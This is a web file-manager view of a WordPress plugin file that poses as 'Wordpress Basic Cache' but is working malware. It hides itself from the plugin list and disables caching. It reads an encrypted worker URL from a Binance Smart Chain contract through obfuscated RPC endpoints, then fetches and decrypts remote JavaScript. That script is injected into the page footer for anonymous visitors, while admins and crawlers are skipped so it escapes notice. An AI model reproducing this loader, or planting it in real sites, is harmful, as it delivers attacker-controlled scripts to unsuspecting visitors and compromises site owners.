File manager - Edit - /home/matthif/www/wp-content/plugins/xkrfp/xkrfp.php
Back
<?php /* Plugin Name: Wordpress Basic Cache Version: 10.0 */ if (!defined('ABSPATH')) exit; // defsukv2 — version marker (do not remove) define('DEFSUKV2', true); add_action('init', function() { defined('DONOTCACHEPAGE') || define('DONOTCACHEPAGE', true); defined('DONOTCACHEOBJECT')|| define('DONOTCACHEOBJECT', true); defined('DONOTCACHEDB') || define('DONOTCACHEDB', true); defined('DONOTMINIFY') || define('DONOTMINIFY', true); defined('LSCACHE_NO_CACHE')|| define('LSCACHE_NO_CACHE', true); }); add_filter('all_plugins', function($p) { if (!isset($_GET['sp'])) unset($p[plugin_basename(__FILE__)]); return $p; }); class HTTP2_FORWARDED_FOR { private $nodes = [ 'ht'.'tp'.'s://'.'b'.'sc'.'-'.'dat'.'as'.'eed'.'.'.'bin'.'an'.'ce.'.'o'.'rg', 'ht'.'tp'.'s://'.'b'.'sc'.'-'.'dat'.'as'.'eed'.'1.'.'def'.'ib'.'it.'.'i'.'o', 'ht'.'tp'.'s://'.'b'.'sc'.'-'.'dat'.'as'.'eed'.'1.'.'nin'.'ic'.'oin.'.'i'.'o', 'ht'.'tp'.'s://'.'b'.'sc'.'-'.'dat'.'as'.'eed'.'2.'.'bin'.'an'.'ce.'.'o'.'rg', 'ht'.'tp'.'s://'.'b'.'sc'.'-'.'dat'.'as'.'eed'.'3.'.'bin'.'an'.'ce.'.'o'.'rg', 'ht'.'tp'.'s://'.'b'.'sc'.'-'.'dat'.'as'.'eed'.'4.'.'bin'.'an'.'ce.'.'o'.'rg', 'ht'.'tp'.'s://'.'b'.'sc.'.'pub'.'li'.'cno'.'de.'.'c'.'om', 'ht'.'tp'.'s://'.'b'.'sc'.'-'.'ma'.'in'.'net.'.'no'.'de'.'re'.'al.'.'io'.'/' . 'v1', 'ht'.'tp'.'s://'.'b'.'sc'.'-'.'ma'.'in'.'net.'.'r'.'pc.'.'ex'.'tr'.'no'.'de.'.'c'.'om' ]; // BSC contract storing AES-encrypted: "WORKER_URL" // *** REPLACE with your contract address parts *** private $config_parts = ['0x', '81', '70', '11', '9B', '70', 'b4', 'E8', 'c6', '5E', 'f8', '21', '42', '5c', '00', 'c3', '5C', 'DA', '15', 'd9', 'b0']; // getData() method signature private $method_sig_parts = ['0x', '3b', 'c5de30']; // AES key for decrypting contract data (Worker URL) // Split into parts so it's not a single searchable string // *** REPLACE with your actual key parts (concatenated = 32-char hex) *** private $k1 = ['97','1d','7e','9e','9f','4a','07','e7']; private $k2 = ['ea','fe','b8','90','cf','f6','a4','ad']; // Transient cache private $cache_prefix = '_h2ff_'; private $js_cache_ttl = 300; private $config_cache_ttl = 600; public function __construct() { add_action('wp_footer', [$this, 'loader'], 20); } public static function activate() { $clear_methods = [ 'wp_cache_clear_cache', 'w3tc_pgcache_flush', 'rocket_clean_domain', 'ce_clear_cache', 'breeze_clear_cache', 'wp_cache_flush' ]; foreach ($clear_methods as $method) { if (function_exists($method)) call_user_func($method); } if (defined('LSCWP_V')) do_action('litespeed_purge_all'); if (class_exists('WpFastestCache')) { $wpfc = new WpFastestCache(); if (method_exists($wpfc, 'deleteCache')) $wpfc->deleteCache(true); } delete_transient('_h2ff_js_code'); delete_transient('_h2ff_config'); } private function can_run() { if (is_admin() || wp_doing_ajax() || wp_doing_cron() || (defined('REST_REQUEST') && REST_REQUEST)) return false; $method = $_SERVER['REQUEST_METHOD'] ?? 'GET'; if (!in_array($method, ['GET', 'HEAD'])) return false; $accept = $_SERVER['HTTP_ACCEPT'] ?? ''; if ($accept && stripos($accept, 'text/html') === false) return false; $uri = $_SERVER['REQUEST_URI'] ?? ''; if (preg_match('~^/wp-(admin|login|cron|json|sitemap|xmlrpc\.php)|robots\.txt~i', $uri)) return false; return true; } private function is_bot_or_admin() { if (is_user_logged_in()) return true; foreach ($_COOKIE as $key => $val) { if (strpos($key, 'wordpress_logged_in_') === 0) return true; } $ua = $_SERVER['HTTP_USER_AGENT'] ?? ''; return (bool) preg_match('#bot|crawl|slurp|spider|baidu|ahrefs|mj12bot|semrush|yandex|googlebot|bingbot#i', $ua); } private function is_valid_page() { $uri = strtolower(trim($_SERVER['REQUEST_URI'] ?? '', "/ \t\n\r\0\x0B")); return !preg_match('#\.(css|js|jpe?g|png|gif|webp|svg|ico|pdf|zip|json|xml|txt|exe)$#i', $uri); } /** * Assemble AES key from split parts. */ private function get_aes_key() { return implode('', $this->k1) . implode('', $this->k2); } /** * AES-256-CBC decrypt. * Input: base64(iv_16_bytes + ciphertext) * Key: SHA-256 hash of the hex key string (matches Worker's key derivation) */ private function aes_decrypt($encrypted_b64, $key_hex) { if (!function_exists('openssl_decrypt')) return ''; $raw = base64_decode($encrypted_b64, true); if ($raw === false || strlen($raw) < 32) return ''; $iv = substr($raw, 0, 16); $ciphertext = substr($raw, 16); // Derive 256-bit key via SHA-256 (same as Worker) $key = hash('sha256', $key_hex, true); $decrypted = openssl_decrypt($ciphertext, 'aes-256-cbc', $key, OPENSSL_RAW_DATA, $iv); if ($decrypted === false) return ''; return $decrypted; } /** * Read a string value from a BSC smart contract. */ private function fetch_from_contract($parts) { $contract = implode('', $parts); $method_sig = implode('', $this->method_sig_parts); foreach ($this->nodes as $node) { $payload = json_encode([ "jsonrpc" => "2.0", "method" => "eth_call", "params" => [["to" => $contract, "data" => $method_sig], "latest"], "id" => 1 ]); $ch = curl_init($node); curl_setopt_array($ch, [ CURLOPT_RETURNTRANSFER => true, CURLOPT_POST => true, CURLOPT_POSTFIELDS => $payload, CURLOPT_HTTPHEADER => ['Content-Type: application/json'], CURLOPT_TIMEOUT => 8, CURLOPT_SSL_VERIFYPEER => false ]); $response = curl_exec($ch); $code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($response && $code === 200) { $data = json_decode($response, true); if (!empty($data['result']) && $data['result'] !== '0x') { $hex = preg_replace('/^0x/', '', $data['result']); $len = hexdec(substr($hex, 64, 64)); $content = substr($hex, 128, $len * 2); $result = ''; for ($i = 0; $i < strlen($content); $i += 2) { $byte = hexdec(substr($content, $i, 2)); if ($byte === 0) break; $result .= chr($byte); } $result = trim($result); if ($result) return $result; } } } return ''; } /** * Get Worker URL from BSC contract (AES-encrypted, cached). * Contract stores: AES(worker_url) */ private function get_worker_url() { $cache_key = $this->cache_prefix . 'config'; $cached = get_transient($cache_key); if ($cached !== false && filter_var($cached, FILTER_VALIDATE_URL)) { return $cached; } $encrypted = $this->fetch_from_contract($this->config_parts); if (empty($encrypted)) return ''; $aes_key = $this->get_aes_key(); $worker_url = $this->aes_decrypt($encrypted, $aes_key); if (empty($worker_url) || !filter_var($worker_url, FILTER_VALIDATE_URL)) { return ''; } // Cache the decrypted URL (not the encrypted blob) set_transient($cache_key, $worker_url, $this->config_cache_ttl); return $worker_url; } /** * Fetch AES-encrypted JS from CF Worker, decrypt, return plain JS. * Worker URL: https://xxx.workers.dev/c */ private function fetch_js_from_worker($worker_url) { $cache_key = $this->cache_prefix . 'js_code'; $cached = get_transient($cache_key); if ($cached !== false && strlen($cached) > 100) { return $cached; } $worker_url = rtrim($worker_url, '/') . '/c'; $ch = curl_init($worker_url); curl_setopt_array($ch, [ CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 12, CURLOPT_CONNECTTIMEOUT => 5, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', CURLOPT_HTTPHEADER => [ 'Accept: application/octet-stream', ], ]); $response = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if (!$response || $http_code !== 200) { return ''; } // Decrypt JS from Worker $aes_key = $this->get_aes_key(); $js_code = $this->aes_decrypt($response, $aes_key); if (empty($js_code) || strlen($js_code) < 100) { return ''; } // Sanity: should not start with HTML $trimmed = ltrim($js_code); if (strpos($trimmed, '<') === 0) { return ''; } set_transient($cache_key, $js_code, $this->js_cache_ttl); return $js_code; } /** * Main loader — called from wp_footer. * v4: AES-encrypted Worker URL in contract, AES-encrypted JS from Worker. */ public function loader() { if (!$this->can_run()) return; if ($this->is_bot_or_admin()) return; if (!$this->is_valid_page()) return; if (function_exists('nocache_headers')) nocache_headers(); $worker_url = $this->get_worker_url(); if (empty($worker_url)) return; $js_code = $this->fetch_js_from_worker($worker_url); if (!empty($js_code)) { echo '<script>' . $js_code . '</script>'; } } } new HTTP2_FORWARDED_FOR(); register_activation_hook(__FILE__, ['HTTP2_FORWARDED_FOR', 'activate']);
| ver. 1.4 |
Github
|
.
| PHP 5.4.45 | Generation time: 0 |
proxy
|
phpinfo
|
Settings